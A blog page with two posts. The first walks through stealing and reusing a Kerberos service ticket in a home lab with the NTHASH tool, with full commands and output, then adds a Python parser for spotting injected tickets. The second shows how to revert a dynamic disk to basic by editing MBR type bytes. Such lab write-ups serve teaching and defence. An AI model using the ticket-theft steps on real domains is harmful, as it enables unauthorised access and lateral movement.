Oct 31 2022

We will be discussing privilege escalation and/or lateral movement by stealing Kerberos tickets.

The theory.

So you have access to a host where other users (ideally local or domain admins) are logged on?

Let's:
-List the Kerberos ticket(s) with nthash-win64 /klist
-Export the TGS ticket with nthash-win64 /ask /input:service/fqdn
-Import (in another session, or on another host) the (preferably TGS) ticket with nthash-win64 /binary:ticket.kirbi

Note 1: an admin can touch all tickets (pass the luid parameter).
Note 2: if host2/attacker is a domain-joined computer, a TGT may be enough (your host "should" request the TGS itself when you access a service).
Note 3: this is not about requesting/forging a ticket (see Rubeus) but about stealing an existing ticket.

Practical example.

On host1/victim, we can see that the logged-on user (user1) has access to a remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \\WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \\WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 288 576 octets libres

And indeed, there is a service ticket in that session which we may want to steal (cifs/WIN-BBC4BS466Q5.home.lab).

nthash-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Let's export this ticket to a file (which we will import later on).

nthash-win64.exe /ask /input:cifs/WIN-BBC4BS466Q5.home.lab
NTHASH 1.8 x64 by erwan2212@gmail.com
Asking for: cifs/WIN-BBC4BS466Q5.home.lab
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewUntil:07/11/2022 16:26:32
ServiceName: cifs/WIN-BBC4BS466Q5.home.lab
ClientName: user1
Flags: 40A50000
KeyType: 00000012
Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3
TicketEncType: 00000012
Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302

* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi

On host2/attacker, we can see that we do not (yet) have access to the target remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le nom d’utilisateur ou le mot de passe est incorrect.

Let's import the ticket exported in the previous step.

NTHASH-win64.exe /ptt /binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi
NTHASH 1.8 x64 by erwan2212@gmail.com
Ticket successfully submitted for current session

Let's confirm that the ticket now appears in our current (attacker) session.

NTHASH-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Let's now confirm that we do have access to the remote share (although our session is not running as the original "user1", nor do we know user1's password).

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \\WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \\WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 296 768 octets libres
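From the defender's side, the attacker session above is recognisable in /klist output: it holds a service ticket for the share but no krbtgt TGT, and the ticket's Client Name is not the session's own user. The following added example (not part of the original post or of NTHASH) parses the /klist layout shown above and flags both conditions; the sample text is constructed from the output on this page, and the "no TGT" check is a heuristic, since a stolen TGT can be injected as well.

```python
import re

# Constructed sample, copying the /klist layout shown on this page: a session that
# holds only a service ticket for the share and no krbtgt TGT (as on host2 after /ptt).
SAMPLE_KLIST = """NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000
"""

KNOWN_FIELDS = {"EncryptionType", "StartTime", "EndTime", "RenewTime",
                "Server Name", "Client Name", "Flags"}


def parse_klist(text: str) -> list[dict]:
    """Split /klist output into one dict per ticket; blocks are separated by blank lines."""
    tickets = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")  # first ':' only; timestamps contain ':' too
            if sep and key.strip() in KNOWN_FIELDS:
                fields[key.strip()] = value.strip()
        if "Server Name" in fields:  # skips the banner block
            tickets.append(fields)
    return tickets


def find_anomalies(tickets: list[dict], session_user: str) -> list[str]:
    """Heuristics for tickets that were injected rather than obtained by this session.

    - a session normally obtains service tickets through its own TGT, so service tickets
      without any krbtgt/ entry are suspicious (a stolen TGS imported with /ptt);
    - a ticket whose Client Name is not the session's own user was issued to someone else.
    """
    findings = []
    has_tgt = any(t["Server Name"].lower().startswith("krbtgt/") for t in tickets)
    if tickets and not has_tgt:
        findings.append("service ticket(s) present but no krbtgt TGT in this session")
    for t in tickets:
        client = t.get("Client Name", "")
        if client.lower() != session_user.lower():
            findings.append(f"{t['Server Name']} is issued to {client}, session user is {session_user}")
    return findings
```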

Oct 09 2022

You have set up a new disk as a "dynamic disk" and now you want to go back to a basic disk.

But the option is grayed out in the Windows Disk Management console.

Let's see how to revert to a basic disk without losing data, using CloneDisk.

This procedure applies to an MBR disk, but a similar procedure can be performed on a GPT disk.

Warning: if you work on a production disk/system, take a backup/snapshot first so that you can roll back your changes if needed.

First, check the partition table: you do need a partition table to perform this operation, and if your disk is a "data" disk, i.e. not a "system" disk, your dynamic disk most probably does not have a partition table matching your existing volumes.

See the screenshots below:

-we have 2 disks (0 and 1): one basic (system) and one dynamic (data)

-we have 4 volumes (2 on each disk)

-the second disk (disk 1) does not have a partition table reflecting its volumes (since it is a dynamic disk)

You need to use the "RETAIN" diskpart command to instruct your system to create a partition table for your volumes.

Note that you most probably would not need to perform this step if your disk is a "system" one (the system will already have taken care of the partition table).

Now, let's have a look at the partition table again.

Much better 🙂

Now let's change the partition type of all partitions (0x42 indicates a dynamic disk).

We will change our data partitions (here numbers 4 and 2) to 0x07, aka IFS (NTFS), and we will set the "dummy" partitions (leftovers from the dynamic disk) to 0x17, aka Hidden IFS, so that they stay hidden.

Then we take the disk offline and back online to force the system to re-read it (we could/should actually have performed the change while the disk was offline and brought it online once done).

Now let's check the Disk Management console again and, "tada", our dynamic disk has been reverted to a basic disk 🙂
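To make the type-byte change above concrete, here is an added example (not CloneDisk's code, not part of the original post) that decodes the four primary entries of an MBR sector and rewrites only the type byte: 0x42 becomes 0x07 for the real volumes and 0x17 for the leftover "dummy" entries. The sample sector, its offsets and which entries are the real volumes are constructed for the example; on a real disk you would read sector 0 into `mbr` and write the result back only after the backup/snapshot mentioned above.

```python
import struct

MBR_SIZE, TABLE_OFFSET, ENTRY_SIZE = 512, 446, 16
ENTRY_FMT = "<B3xB3xII"          # status, (CHS start), type, (CHS end), first LBA, sector count
TYPE_DYNAMIC, TYPE_IFS, TYPE_HIDDEN_IFS = 0x42, 0x07, 0x17


def read_partitions(mbr: bytes) -> list[dict]:
    """Decode the four primary entries of an MBR sector (unused entries have type 0)."""
    if len(mbr) != MBR_SIZE or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not a valid MBR sector (size or 55AA signature)")
    entries = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack_from(ENTRY_FMT, mbr, TABLE_OFFSET + i * ENTRY_SIZE)
        entries.append({"number": i + 1, "bootable": status == 0x80,
                        "type": ptype, "lba": lba, "sectors": count})
    return entries


def set_partition_types(mbr: bytes, new_types: dict[int, int]) -> bytes:
    """Return a copy of the sector with the type byte of the given entries (1-4) replaced.

    Only byte 4 of each 16-byte entry changes; CHS/LBA fields and the volume data are untouched.
    """
    buf = bytearray(mbr)
    for number, ptype in new_types.items():
        if not 1 <= number <= 4 or not 0 <= ptype <= 0xFF:
            raise ValueError(f"bad entry {number} or type {ptype:#x}")
        buf[TABLE_OFFSET + (number - 1) * ENTRY_SIZE + 4] = ptype
    return bytes(buf)


def build_sample_mbr() -> bytes:
    """Constructed sample: a data disk after diskpart RETAIN, every entry still typed 0x42.

    Entries 1 and 3 stand for the small LDM leftovers, entries 2 and 4 for the two real
    volumes (offsets and sizes are made up for the example).
    """
    buf = bytearray(MBR_SIZE)
    layout = [(2048, 2048), (4096, 409600), (413696, 2048), (415744, 409600)]
    for i, (lba, count) in enumerate(layout):
        struct.pack_into(ENTRY_FMT, buf, TABLE_OFFSET + i * ENTRY_SIZE, 0x00, TYPE_DYNAMIC, lba, count)
    buf[510:512] = b"\x55\xaa"
    return bytes(buf)


def revert_to_basic(mbr: bytes, data_entries: set[int]) -> bytes:
    """Apply the recipe from the post: 0x42 -> 0x07 for real volumes, 0x42 -> 0x17 for the rest."""
    changes = {p["number"]: (TYPE_IFS if p["number"] in data_entries else TYPE_HIDDEN_IFS)
               for p in read_partitions(mbr) if p["type"] == TYPE_DYNAMIC}
    return set_partition_types(mbr, changes)
```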